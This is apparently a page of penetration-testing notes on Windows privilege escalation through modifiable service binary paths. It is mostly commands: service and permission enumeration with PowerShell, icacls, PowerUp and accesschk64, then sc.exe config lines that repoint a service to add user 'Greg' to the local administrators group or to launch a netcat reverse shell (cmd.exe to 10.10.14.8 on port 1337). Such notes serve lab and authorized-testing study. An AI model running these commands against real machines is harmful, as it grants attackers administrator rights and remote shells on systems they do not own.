Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation via Powershell

View services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

View permissions

icacls "C:\xampp\apache\bin\mysqld.exe"

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Replace service binary with malicious one then restart service

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
net stop mysql
net start mysql
shutdown /r /t 0

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks

Change the binary path

sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

sc.exe start dacl

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe --accept-eula -uwcv Everyone *

accesschk64.exe -uwcv daclsvc

Query the service

sc qc daclsvc

Changing the binary path is the same as the last method

PreviousService Permissions NextUnquoted Service Paths

Last updated 1 year ago

hashtagOverview

hashtagExploitation via Powershell

hashtagExploitation using PowerUp

hashtagRun PowerUp on machine

hashtagChange the binary path

hashtagStart service

hashtagExploitation via Accesschk64

hashtagCheck for services with write permissions

hashtagQuery the service

hashtagChanging the binary path is the same as the last method